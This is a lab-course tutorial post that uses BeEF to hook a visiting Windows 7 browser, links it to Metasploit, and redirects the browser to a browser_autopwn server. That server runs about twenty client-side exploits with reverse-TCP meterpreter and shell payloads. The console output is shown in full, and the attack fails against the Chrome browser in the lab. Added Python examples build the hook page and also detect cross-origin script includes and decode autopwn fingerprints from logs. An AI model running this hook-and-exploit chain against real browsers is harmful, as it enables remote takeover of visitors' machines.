Security/Metasploit 2016.06.08 13:58

Metasploit - 18. BeEF & MSF (Web browser hacking)

This material is organized for hands-on practice in a training course. Anyone who uses it for personal or malicious purposes bears the legal responsibility themselves.

[Lab systems] Kali Linux, Firewall, Windows 7

 - Use the 'BeEF' tool together with Metasploit to hook a web browser and try to obtain a remote shell.

[Lab steps]

Create a web page -> Link BeEF & Metasploit and load the plugin -> Set up the redirect page and deliver the malicious code -> Connect

Ex1) Create a test web page and restart Apache

 - The page that Apache serves on port 80 is what carries the BeEF hook into the visiting browser (Ex5 later shows the hooked domain as 192.168.20.50:80), so the BeEF hook script is embedded in index.html here. The Hook URL to embed is printed when BeEF starts, in Ex3.

root@kali:~# cd /var/www/html
root@kali:/var/www/html# ls
index.html
root@kali:/var/www/html# vi index.html
root@kali:/var/www/html# cd
root@kali:~# service apache2 restart

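As an added example (not code from the original post or from BeEF), here is the kind of index.html this step creates, together with the check a defender can run over served pages: list every script include whose origin differs from the page's own, which is exactly how a hook script rides into a visitor's browser. The addresses (BeEF on 192.168.20.50:3000, Apache on port 80) are the ones used elsewhere on this page; the page markup itself is assumed.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Assumed lab values (addresses used on this page): BeEF listens on the Kali
# host on port 3000, Apache serves the test page on port 80.
BEEF_HOST = "192.168.20.50"
BEEF_PORT = 3000
PAGE_URL = "http://192.168.20.50/"


def hook_url(host=BEEF_HOST, port=BEEF_PORT):
    """The Hook URL BeEF prints for an interface when it starts."""
    return f"http://{host}:{port}/hook.js"


def build_hook_page(host=BEEF_HOST, port=BEEF_PORT):
    """A minimal index.html of the kind this lab serves: harmless content plus
    one script include.  That include is the whole 'attack'; once it loads,
    the visiting browser polls BeEF and runs whatever modules are queued."""
    return (
        "<!DOCTYPE html>\n"
        "<html>\n"
        "<head><title>Test page</title></head>\n"
        "<body>\n"
        "<h1>Welcome</h1>\n"
        f'<script src="{hook_url(host, port)}"></script>\n'
        "</body>\n"
        "</html>\n"
    )


class _ScriptSources(HTMLParser):
    """Collect the src attribute of every <script> tag."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.sources.append(value)


def _origin(url):
    """scheme://host:port with the default port spelled out, so that
    http://h/ and http://h:80/ compare equal while http://h:3000/ does not."""
    parts = urlsplit(url)
    port = parts.port or (443 if parts.scheme == "https" else 80)
    return f"{parts.scheme}://{parts.hostname}:{port}"


def foreign_scripts(html, page_url):
    """Return every script include whose origin differs from the page's own.
    Relative and protocol-relative srcs are resolved against page_url first,
    so only genuinely cross-origin includes are reported."""
    parser = _ScriptSources()
    parser.feed(html)
    page_origin = _origin(page_url)
    return [
        urljoin(page_url, src)
        for src in parser.sources
        if _origin(urljoin(page_url, src)) != page_origin
    ]


if __name__ == "__main__":
    page = build_hook_page()
    print(page)
    # The page comes from port 80 but pulls a script from port 3000, so the
    # same-origin check flags the hook even though host and scheme match.
    print(foreign_scripts(page, PAGE_URL))
```

Note that a different port alone makes the include cross-origin; the hook still runs with the page's origin in the browser, which is why BeEF reports the hooked domain as 192.168.20.50:80 rather than :3000.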

Ex2) Change the BeEF configuration file and load the msfconsole plugin

 - Change the BeEF configuration file so that BeEF can work together with Metasploit.

@ Kali Linux

(Terminal 1)

root@kali:~# vi /usr/share/beef-xss/config.yaml

~ omitted ~

   # You may override default extension configuration parameters here
    extension:
        requester:
            enable: true
        proxy:
            enable: true
            key: "beef_key.pem"
            cert: "beef_cert.pem"
        metasploit:
            enable: false <- change to true

~ omitted ~

:wq!


 - Check the msgrpc settings of BeEF's Metasploit extension. host, port, user and pass here must match the values msgrpc is started with in msfconsole, and callback_host must be the IP on which MSF listens (see the comments at the top of the file).

root@kali:~# vi /usr/share/beef-xss/extensions/metasploit/config.yaml

#
# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# Enable MSF by changing extension:metasploit:enable to true
# Then set msf_callback_host to be the public IP of your MSF server
#
# Ensure you load the xmlrpc interface in Metasploit
# msf > load msgrpc ServerHost=IP Pass=abc123
# Please note that the ServerHost parameter must have the same value of host and callback_host variables here below.
# Also always use the IP of your machine where MSF is listening.
beef:
    extension:
        metasploit:
            name: 'Metasploit'
            enable: true
            host: "127.0.0.1"
            port: 55552
            user: "msf"
            pass: "abc123"
            uri: '/api'
            # if you need "ssl: true" make sure you start msfrpcd with "SSL=y", like:
            # load msgrpc ServerHost=IP Pass=abc123 SSL=y
            ssl: false
            ssl_version: 'TLSv1'
            ssl_verify: true
            callback_host: "127.0.0.1"
            autopwn_url: "autopwn"
            auto_msfrpcd: false
            auto_msfrpcd_timeout: 120
            msf_path: [
 ~ omitted ~

:q!

 - Start msfconsole and load the msgrpc plugin. With no ServerHost or ServerPort given, msgrpc binds to 127.0.0.1:55552, which matches the host and port in the extension config above.

@ Kali Linux

root@kali:~# ls /usr/share/metasploit-framework/plugins/msgrpc.rb
/usr/share/metasploit-framework/plugins/msgrpc.rb

root@kali:~# msfconsole -q
msf >
msf > load msgrpc Pass=abc123
[*] MSGRPC Service:  127.0.0.1:55552
[*] MSGRPC Username: msf
[*] MSGRPC Password: abc123
[*] Successfully loaded plugin: msgrpc
msf >

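As an added example (not part of the original post, of BeEF or of Metasploit), the script below reads the metasploit section of the extension config shown above and derives the msfconsole line whose options match it, plus a few consistency warnings, so the two sides cannot drift apart. It parses only the flat key: value lines under metasploit: (no YAML library), and the embedded config is the fragment from this page with msf_path left out. The option names ServerHost, ServerPort, User, Pass and SSL are those of Metasploit's msgrpc plugin; the bare 'load msgrpc Pass=abc123' run above relies on the plugin defaults 127.0.0.1 and 55552 for the first two.

```python
import re

# The extension config from this page (msf_path omitted).
SAMPLE_CONFIG = """\
beef:
    extension:
        metasploit:
            name: 'Metasploit'
            enable: true
            host: "127.0.0.1"
            port: 55552
            user: "msf"
            pass: "abc123"
            uri: '/api'
            # if you need "ssl: true" make sure you start msfrpcd with "SSL=y"
            ssl: false
            ssl_version: 'TLSv1'
            ssl_verify: true
            callback_host: "127.0.0.1"
            autopwn_url: "autopwn"
            auto_msfrpcd: false
            auto_msfrpcd_timeout: 120
"""

_KV = re.compile(r"^(\s*)([A-Za-z_]+):\s*(.*?)\s*$")


def _coerce(raw):
    """Turn a YAML scalar written in this file's style into a Python value."""
    raw = raw.strip().strip("'\"")
    if raw in ("true", "false"):
        return raw == "true"
    if raw.isdigit():
        return int(raw)
    return raw


def parse_metasploit_extension(text):
    """Return the scalar settings nested directly under 'metasploit:'.
    Nested mappings and lists (e.g. msf_path) are skipped."""
    settings, inside, base_indent = {}, False, 0
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = _KV.match(line)
        if not m:
            continue
        indent, key, value = len(m.group(1)), m.group(2), m.group(3)
        if not inside:
            if key == "metasploit" and value == "":
                inside, base_indent = True, indent
            continue
        if indent <= base_indent:
            break  # dedented: left the metasploit block
        if value == "" or value.startswith("["):
            continue
        settings[key] = _coerce(value)
    return settings


def msgrpc_load_line(cfg):
    """The msfconsole command whose msgrpc options match this BeEF config."""
    parts = [
        "load msgrpc",
        f"ServerHost={cfg['host']}",
        f"ServerPort={cfg['port']}",
        f"User={cfg['user']}",
        f"Pass={cfg['pass']}",
    ]
    if cfg.get("ssl"):
        parts.append("SSL=y")
    return " ".join(parts)


def config_warnings(cfg):
    """Settings that break the BeEF <-> MSF link or leave it exposed."""
    warnings = []
    if cfg.get("host") != cfg.get("callback_host"):
        warnings.append("host and callback_host differ; both must be the IP where MSF listens")
    if cfg.get("pass") == "abc123":
        warnings.append("pass is the documentation default; anyone who can reach msgrpc and knows it gets full MSF control")
    if not cfg.get("ssl"):
        warnings.append("ssl is off; msgrpc credentials and calls travel in clear text (acceptable only on loopback)")
    return warnings


if __name__ == "__main__":
    cfg = parse_metasploit_extension(SAMPLE_CONFIG)
    print(msgrpc_load_line(cfg))
    for w in config_warnings(cfg):
        print("warning:", w)
```

For this single-host lab the loopback binding is what keeps the default password tolerable; if BeEF and MSF run on different machines, host and callback_host both have to become the MSF machine's IP and the password should be changed.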
Ex3) Run BeEF

 - Run BeEF and note the Hook URL and UI URL it prints for each interface. The "Successful connection with Metasploit" line confirms the msgrpc link set up in Ex2.

@ Kali Linux

(Terminal 2)

root@kali:~# cd /usr/share/beef-xss/
root@kali:/usr/share/beef-xss# ls
Gemfile       beef           beef_key.pem  core  extensions
Gemfile.lock  beef_cert.pem  config.yaml   db    modules

root@kali:/usr/share/beef-xss# ./beef -x
[14:37:07][*] Bind socket [imapeudora1] listening on [0.0.0.0:2000].
[14:37:07][*] Browser Exploitation Framework (BeEF) 0.4.6.1-alpha
[14:37:07]    |   Twit: @beefproject
[14:37:07]    |   Site: http://beefproject.com
[14:37:07]    |   Blog: http://blog.beefproject.com
[14:37:07]    |_  Wiki: https://github.com/beefproject/beef/wiki
[14:37:07][*] Project Creator: Wade Alcorn (@WadeAlcorn)
[14:37:07][*] Successful connection with Metasploit.
[14:37:10][*] Loaded 292 Metasploit exploits.
[14:37:10][*] Resetting the database for BeEF.
[14:37:10][*] BeEF is loading. Wait a few seconds...
[14:37:19][*] 13 extensions enabled.
[14:37:19][*] 532 modules enabled.
[14:37:19][*] 3 network interfaces were detected.
[14:37:19][+] running on network interface: 127.0.0.1
[14:37:19]    |   Hook URL: http://127.0.0.1:3000/hook.js
[14:37:19]    |_  UI URL:   http://127.0.0.1:3000/ui/panel
[14:37:19][+] running on network interface: 192.168.1.50
[14:37:19]    |   Hook URL: http://192.168.1.50:3000/hook.js
[14:37:19]    |_  UI URL:   http://192.168.1.50:3000/ui/panel
[14:37:19][+] running on network interface: 192.168.20.50
[14:37:19]    |   Hook URL: http://192.168.20.50:3000/hook.js
[14:37:19]    |_  UI URL:   http://192.168.20.50:3000/ui/panel
[14:37:19][*] RESTful API key: 09f11aee7ba6b8a01fecd44cda371bb9be734178
[14:37:19][*] HTTP Proxy: http://127.0.0.1:6789
[14:37:19][*] DNS Server: 127.0.0.1:5300 (udp)
[14:37:19]    |   Upstream Server: 8.8.8.8:53 (udp)
[14:37:19]    |_  Upstream Server: 8.8.8.8:53 (tcp)
[14:37:19][*] BeEF server started (press control+c to stop)

 - BeEF is now running, so open the BeEF web UI in Firefox (login beef/beef).

(Terminal 3)

root@kali:~# firefox http://127.0.0.1:3000/ui/panel &
[1] 3053

Ex4) From Windows 7, browse to 'http://192.168.20.50'

 - On Windows 7, open Chrome and browse to 'http://192.168.20.50' (the Apache page from Ex1).

Ex5) Check the BeEF hooking result

 - Check in BeEF whether the Windows 7 browser has been hooked.

(Terminal 2)

[14:54:55][!] [Browser Details] Invalid browser name returned from the hook browser's initial connection.
[14:54:55][*] New Hooked Browser [id:1, ip:192.168.20.202, type:UNKNOWN-UNKNOWN, os:Windows 7], hooked domain [192.168.20.50:80]

 - The hook identified the OS but not the browser ("Invalid browser name"), so the type shows as UNKNOWN-UNKNOWN. The hooked domain is 192.168.20.50:80, i.e. the Apache page: the hook runs with that page's origin, not BeEF's.

 - Check the Metasploit modules loaded into BeEF.

Click '192.168.20.202' -> Commands -> check the Metasploit modules

Ex6) msfconsole setup

 - Use the 'browser_autopwn' module to try to gain control. It starts a set of client-side exploits behind one URL, fingerprints each visiting browser with JavaScript and serves the exploits that match, with payloads that connect back over reverse TCP.

(Terminal 1)

msf > search autopwn

Matching Modules
================

   Name                               Disclosure Date  Rank    Description
   ----                               ---------------  ----    -----------
   auxiliary/server/browser_autopwn                    normal  HTTP Client Automatic Exploiter
   auxiliary/server/browser_autopwn2  2015-07-05       normal  HTTP Client Automatic Exploiter 2 (Browser Autopwn)

msf > use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn) >
msf auxiliary(browser_autopwn) > show options

Module options (auxiliary/server/browser_autopwn):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   LHOST                     yes       The IP address to use for reverse-connect payloads
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Auxiliary action:

   Name       Description
   ----       -----------
   WebServer  Start a bunch of modules and direct clients to appropriate exploits

msf auxiliary(browser_autopwn) > set LHOST 192.168.20.50
LHOST => 192.168.20.50


msf auxiliary(browser_autopwn) > set SRVHOST 192.168.20.50
SRVHOST => 192.168.20.50


msf auxiliary(browser_autopwn) > set URIPATH /
URIPATH => /

msf auxiliary(browser_autopwn) > exploit
[*] Auxiliary module execution completed

[*] Setup

[*] Starting exploit modules on host 192.168.20.50...
[*] ---
[*] Starting exploit android/browser/webview_addjavascriptinterface with payload android/meterpreter/reverse_tcp
[*] Using URL: http://192.168.20.50:8080/DvYSfcQe
[*] Server started.
[*] Starting exploit multi/browser/firefox_proto_crmfrequest with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.20.50:8080/BFKrz
[*] Server started.
[*] Starting exploit multi/browser/firefox_tostring_console_injection with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.20.50:8080/oLImqQCiwX
[*] Server started.
[*] Starting exploit multi/browser/firefox_webidl_injection with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.20.50:8080/IPzOblzFmvNUs
[*] Server started.
[*] Starting exploit multi/browser/java_atomicreferencearray with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.20.50:8080/eZPzGOmcehw
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_jmxbean with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.20.50:8080/fVOVKNVB
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_provider_skeleton with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.20.50:8080/oOgkj
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_reflection_types with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.20.50:8080/SylveaoPPa
[*] Server started.
[*] Starting exploit multi/browser/java_rhino with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.20.50:8080/NlVHFCqH
[*] Server started.
[*] Starting exploit multi/browser/java_verifier_field_access with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.20.50:8080/lOIVOnA
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.20.50:8080/erXkpBtoOm
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_mp4_cprt with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.20.50:8080/snmfDS
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_rtmp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.20.50:8080/LexolDUFeWQBB
[*] Server started.
[*] Starting exploit windows/browser/ie_cgenericelement_uaf with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.20.50:8080/GqHTwwRxD
[*] Server started.
[*] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.20.50:8080/DWSpC
[*] Server started.
[*] Starting exploit windows/browser/ie_execcommand_uaf with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.20.50:8080/hHvY
[*] Server started.
[*] Starting exploit windows/browser/mozilla_nstreerange with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.20.50:8080/pHIpzR
[*] Server started.
[*] Starting exploit windows/browser/ms13_080_cdisplaypointer with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.20.50:8080/hXbtRRwrz
[*] Server started.
[*] Starting exploit windows/browser/ms13_090_cardspacesigninhelper with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.20.50:8080/iJYGUiD
[*] Server started.
[*] Starting exploit windows/browser/msxml_get_definition_code_exec with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.20.50:8080/fTHiphgZntD
[*] Server started.
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse TCP handler on 192.168.20.50:3333
[*] Starting the payload handler...
[*] Starting handler for java/meterpreter/reverse_tcp on port 7777
[*] Started reverse TCP handler on 192.168.20.50:6666
[*] Started reverse TCP handler on 192.168.20.50:7777
[*] Starting the payload handler...
[*] Starting the payload handler...
[*] --- Done, found 20 exploit modules

[*] Using URL: http://192.168.20.50:8080/
[*] Server started.

Ex7) BeEF setup

 - In the BeEF web UI, run the steps below in order to redirect the hooked browser to the browser_autopwn server started in Ex6 (http://192.168.20.50:8080, the URL it printed last).

@ Kali Linux

Click '192.168.20.202' -> Commands -> Browser -> Hooked Domain -> Redirect Browser -> http://192.168.20.50:8080 -> click Execute

Ex8) Check the redirected web page on Windows 7

 - On Windows 7, confirm that the browser has navigated to the redirected page.

Ex9) Check whether a shell was obtained

 - With the current Chrome browser the test fails. (It also fails with Firefox and Internet Explorer.) That is the expected outcome: the exploit modules browser_autopwn started in Ex6 target old Internet Explorer, Java, Flash, Firefox and Opera versions, while the fingerprint below shows Chrome 51.0.2704.84 on Windows 7. browser_autopwn still answers with 6 candidate exploits, but none of them produces a session.

(Terminal 1)

[*] 192.168.20.202   browser_autopwn - Handling '/'
[*] 192.168.20.202   browser_autopwn - Handling '/?sessid=V2luZG93cyA3OnVuZGVmaW5lZDp1bmRlZmluZWQ6dW5kZWZpbmVkOnVuZGVmaW5lZDprbzp4ODY6Q2hyb21lOjUxLjAuMjcwNC44NDo%3d'
[*] 192.168.20.202   browser_autopwn - JavaScript Report: Windows 7:undefined:undefined:undefined:undefined:ko:x86:Chrome:51.0.2704.84:
[*] 192.168.20.202   browser_autopwn - Reporting: {"os.product"=>"Windows 7", "os.language"=>"ko", "os.arch"=>"x86", "os.certainty"=>"0.7"}
[*] 192.168.20.202   browser_autopwn - Responding with 6 exploits
[*] 192.168.20.202   browser_autopwn - Handling '/favicon.ico'
[*] 192.168.20.202   browser_autopwn - 404ing /favicon.ico
[*] 192.168.20.202   browser_autopwn - Handling '/'
[*] 192.168.20.202   browser_autopwn - Handling '/?sessid=V2luZG93cyA3OnVuZGVmaW5lZDp1bmRlZmluZWQ6dW5kZWZpbmVkOnVuZGVmaW5lZDprbzp4ODY6Q2hyb21lOjUxLjAuMjcwNC44NDo%3d'
[*] 192.168.20.202   browser_autopwn - JavaScript Report: Windows 7:undefined:undefined:undefined:undefined:ko:x86:Chrome:51.0.2704.84:
[*] 192.168.20.202   browser_autopwn - Reporting: {"os.product"=>"Windows 7", "os.language"=>"ko", "os.arch"=>"x86", "os.certainty"=>"0.7"}
[*] 192.168.20.202   browser_autopwn - Responding with 6 exploits
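The sessid in the 'Handling' lines above is a URL-encoded base64 string carrying the browser fingerprint that the autopwn landing page collects with JavaScript, which is why the next line can report the OS, language and architecture. As an added example (not from the original post or from Metasploit), the script below decodes that value, both from the page's own sessid and from a constructed Apache-style access log line, which is what a proxy or web server sitting between victim and attacker would record and what a SOC could hunt for. The nine field names are an assumption based on the order of Metasploit's os_detect fingerprint; the page's 'Reporting:' line confirms the product, language and arch slots.

```python
import base64
import re
from urllib.parse import unquote, urlsplit

# Field order assumed from Metasploit's os_detect fingerprint (the page's
# "Reporting:" line confirms slots 1, 6 and 7).
FIELDS = [
    "os.product", "os.vendor", "os.flavor", "os.device", "os.sp",
    "os.language", "os.arch", "browser.name", "browser.version",
]

# The sessid recorded in the msfconsole output on this page.
PAGE_SESSID = (
    "V2luZG93cyA3OnVuZGVmaW5lZDp1bmRlZmluZWQ6dW5kZWZpbmVkOnVuZGVmaW5lZDprbzp4ODY6"
    "Q2hyb21lOjUxLjAuMjcwNC44NDo%3d"
)

# Constructed Apache combined-format lines (not a real capture): the same
# request as a logging proxy or web server in the path would see it, plus an
# unrelated request that must be ignored.
SAMPLE_LOG_LINES = [
    '192.168.20.202 - - [08/Jun/2016:14:58:02 +0900] "GET /?sessid='
    + PAGE_SESSID
    + ' HTTP/1.1" 200 1337 "http://192.168.20.50/" '
    '"Mozilla/5.0 (Windows NT 6.1) Chrome/51.0.2704.84"',
    '192.168.20.202 - - [08/Jun/2016:14:58:03 +0900] '
    '"GET /favicon.ico HTTP/1.1" 404 200 "-" "-"',
]

_REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def _query_values(url, key):
    """Raw (still percent-encoded) values of one query parameter.  parse_qs
    is avoided on purpose: it turns '+' into a space, and '+' is a base64
    character."""
    values = []
    for pair in urlsplit(url).query.split("&"):
        name, _, value = pair.partition("=")
        if name == key:
            values.append(value)
    return values


def decode_sessid(value):
    """URL-unquote, base64-decode and split an autopwn sessid into fields."""
    raw = base64.b64decode(unquote(value)).decode("utf-8", "replace")
    parts = raw.rstrip(":").split(":")
    parts += [""] * (len(FIELDS) - len(parts))  # tolerate short reports
    return dict(zip(FIELDS, parts))


def fingerprints_from_log(lines):
    """(client_ip, fingerprint) for every request that carries a sessid."""
    hits = []
    for line in lines:
        m = _REQUEST.search(line)
        if not m:
            continue
        for sessid in _query_values(m.group(1), "sessid"):
            hits.append((line.split(" ", 1)[0], decode_sessid(sessid)))
    return hits


def summarize(fp):
    """One-line description of what autopwn learned, e.g. for an alert."""
    return (f"{fp['os.product']} {fp['os.arch']} ({fp['os.language']}), "
            f"{fp['browser.name']} {fp['browser.version']}")


if __name__ == "__main__":
    print(summarize(decode_sessid(PAGE_SESSID)))
    for ip, fp in fingerprints_from_log(SAMPLE_LOG_LINES):
        print(ip, "->", summarize(fp))
```

The decoded fields are exactly the 'JavaScript Report' line above, so the fingerprint is fully recoverable from any log that kept the query string; a sessid parameter whose value base64-decodes to a colon-separated OS/browser string is a cheap indicator of a browser_autopwn landing page.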

msf auxiliary(browser_autopwn) > exit
root@kali:~#

(Terminal 2)

(ctrl+c)
root@kali:~#

(Terminal 3)

(ctrl+c)
root@kali:~#

[YouTube] Video lecture link (Subscribe! Like!!!)

Metasploit - Chapter 1 Metasploit (metaspliot)

Posted by instructor Kim Jung-woo (KakaoTalk: kim10322)